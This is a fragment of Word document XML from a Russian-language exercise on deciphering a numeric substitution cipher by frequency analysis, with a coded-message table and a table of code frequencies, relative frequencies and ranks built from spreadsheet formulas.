                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>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228" w:lineRule="exac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228" w:lineRule="exac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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:righ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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="20"/>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highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>21</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240" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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21</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15</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15</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31</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32</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color w:val="FFFF00"/>
                <w:w w:val="70"/>
                <w:sz w:val="17"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="70"/>
                <w:sz w:val="17"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>32</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38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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="80"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="80"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="20"/>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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="2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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="180"/>
              <w:jc w:val="right"/>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0" w:lineRule="atLeast"/>
              <w:ind w:left="2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ind w:left="20"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="100"/>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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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33</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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="74"/>
                <w:sz w:val="8"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="74"/>
                <w:sz w:val="8"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="100" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="008080"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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33</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23</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28</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gridSpan w:val="2"/>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38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140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="160" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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6</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25</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20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28</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18</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25</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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="80"/>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38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40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highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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300" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="74"/>
                <w:sz w:val="8"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="74"/>
                <w:sz w:val="8"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="100" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="008080"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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21</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23</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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="5"/>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31</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33</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21</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21</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highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>2</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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:righ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100"/>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240" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="20"/>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228" w:lineRule="exact"/>
              <w:ind w:right="20"/>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228" w:lineRule="exact"/>
              <w:ind w:left="80"/>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228" w:lineRule="exac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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>24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228" w:lineRule="exact"/>
              <w:ind w:left="2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24</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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="80"/>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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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00" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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24</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14</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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28</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220" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="2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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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bl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="207" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="271" w:lineRule="auto"/>
        <w:ind w:right="60" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Первый шаг дешифровки – составление таблицы частот, частостей и рангов для кодов зашифрованного сообщения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="163" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1190" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="960"/>
        <w:gridCol w:w="2140"/>
        <w:gridCol w:w="1880"/>
        <w:gridCol w:w="2300"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="240"/>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N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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O</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="188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P</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="230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R</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Счетчик</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Частота</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Частость</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Ранг</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="201"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="201" w:lineRule="exact"/>
              <w:ind w:left="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="201" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>=СЧЕТЕСЛИ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="188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=O2/$O$36=0,015</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="230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=РАНГ(C1;$C$1:$C$34)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="25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($A$1:$L$47;N1)=8</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=22</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5</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0,009124</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25</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3</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0,005474</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27</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4</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26</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0,047445</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6</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5</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0,001825</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29</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6</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14</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0,025547</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13</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7</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5</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0,009124</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25</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8</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0,020073</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18</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9</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0</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33</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10</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19</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0,034672</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10</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11</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19</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0,034672</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10</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12</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9</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0,016423</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21</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13</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16</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0,029197</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12</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14</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26</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0,047445</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6</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15</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10</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0,018248</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20</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16</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31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0,056569</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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="833" w:right="840" w:bottom="515" w:left="1420" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9640"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1190" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="960"/>
        <w:gridCol w:w="2140"/>
        <w:gridCol w:w="1880"/>
        <w:gridCol w:w="2300"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="240"/>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20"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="14" w:name="page14"/>
            <w:bookmarkEnd w:id="14"/>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="188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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="230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33</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18</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34</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0,062044</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3</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19</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0,001825</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29</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20</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14</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0,025547</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13</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21</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12</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0,021898</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15</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22</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8</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0,014599</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22</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23</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20</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0,036496</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9</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24</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23</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0,041971</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8</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25</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0,020073</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18</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26</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101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0,184307</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="218"/>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18" w:lineRule="exact"/>
              <w:ind w:left="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>27</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18" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>3</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18" w:lineRule="exact"/>
              <w:ind w:left="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>0,005474</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18" w:lineRule="exact"/>
              <w:ind w:left="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>27</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28</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12</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0,021898</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15</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29</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0,001825</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29</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30</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50</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0,091241</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31</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8</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0,014599</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22</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32</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34</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0,062044</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3</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33</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12</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0,021898</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15</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34</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0,001825</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29</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="222"/>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3" w:lineRule="exact"/>
              <w:ind w:left="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Итого:</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3" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>=СУММ(O1:O35)=548</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3" w:lineRule="exact"/>
              <w:ind w:left="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>=СУММ(P1:P35)=1</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r>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="exact"/>
